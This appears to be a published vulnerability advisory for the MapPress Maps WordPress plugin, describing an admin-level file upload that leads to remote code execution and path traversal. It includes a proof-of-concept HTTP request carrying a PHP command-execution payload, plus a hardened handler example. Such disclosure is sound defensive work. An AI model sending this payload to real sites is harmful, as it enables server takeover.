WordPress Plugin Vulnerabilities

MapPress Maps for WordPress < 2.73.13 - Admin+ File Upload to Remote Code Execution

Description

The plugin allows a high-privileged user to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the "ajax_save" function. The file is written relative to the current theme's stylesheet directory, and a .php file extension is appended. No validation is performed on the content of the file, so uploading a web shell yields remote code execution. Further, the name parameter is not sanitized, so the payload can be written to any directory the web server has write access to.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 329
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost:8000/wp-admin/admin.php?page=mappress_maps
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: [admin+]

action=mapp_tpl_save&mapdata=%7B%22center%22%3Anull%2C%22height%22%3Anull%2C%22mapid%22%3Anull%2C%22mapTypeId%22%3Anull%2C%22metaKey%22%3Anull%2C%22pois%22%3A%5B%5D%2C%22postid%22%3A0%2C%22search%22%3Anull%2C%22title%22%3Anull%2C%22width%22%3Anull%2C%22zoom%22%3Anull%7D&nonce=9fe04b45b4&name=zero.cgi&content=<?php+echo(`ls`);?>
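
As an added example, not the plugin's own code: a hardened AJAX template-save handler showing the checks the description says were missing (honouring the file-edit switches, nonce and capability checks, a strict name allowlist and a path-containment check). The hook name, nonce action, capability and template directory are assumptions.

```php
<?php
// Added example (not MapPress code): a hardened AJAX template-save handler.
// Hook name, nonce action, capability and template directory are assumptions.
add_action( 'wp_ajax_example_tpl_save', 'example_tpl_save' );

function example_tpl_save() {
    // 1. Honour the site-wide switches the vulnerable handler bypassed.
    if ( ( defined( 'DISALLOW_FILE_MODS' ) && DISALLOW_FILE_MODS )
        || ( defined( 'DISALLOW_FILE_EDIT' ) && DISALLOW_FILE_EDIT ) ) {
        wp_send_json_error( 'File editing is disabled on this site.', 403 );
    }

    // 2. CSRF token and capability: both paths terminate the request on failure.
    check_ajax_referer( 'example_tpl_nonce', 'nonce' );
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'Insufficient privileges.', 403 );
    }

    // 3. Strict allowlist for the name: no slashes, no dots, bounded length.
    //    This rules out "../" traversal and names like "zero.cgi" that would
    //    become "zero.cgi.php" once the handler appends its extension.
    $name = isset( $_POST['name'] ) ? wp_unslash( $_POST['name'] ) : '';
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $name ) ) {
        wp_send_json_error( 'Invalid template name.', 400 );
    }

    // 4. Resolve the template directory and refuse to write anywhere else.
    $base = realpath( trailingslashit( get_stylesheet_directory() ) . 'example-templates' );
    if ( false === $base || ! is_writable( $base ) ) {
        wp_send_json_error( 'Template directory missing or not writable.', 500 );
    }
    $target = $base . DIRECTORY_SEPARATOR . $name . '.php';
    // Defence in depth: the final path must still sit under $base.
    if ( 0 !== strpos( $target, $base . DIRECTORY_SEPARATOR ) ) {
        wp_send_json_error( 'Template path out of bounds.', 400 );
    }

    // 5. Templates are executed as PHP, so the content cannot be made "safe"
    //    by filtering; that is exactly why steps 1 and 2 gate this code path.
    $content = isset( $_POST['content'] ) ? wp_unslash( $_POST['content'] ) : '';
    if ( false === file_put_contents( $target, $content, LOCK_EX ) ) {
        wp_send_json_error( 'Could not write template.', 500 );
    }
    wp_send_json_success( array( 'file' => basename( $target ) ) );
}
```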

Miscellaneous

Original Researcher
qerogram
Submitter
qerogram
Verified
Yes

Timeline

Publicly Published
2022-03-14
Added
2022-03-14
Last Updated
2022-04-17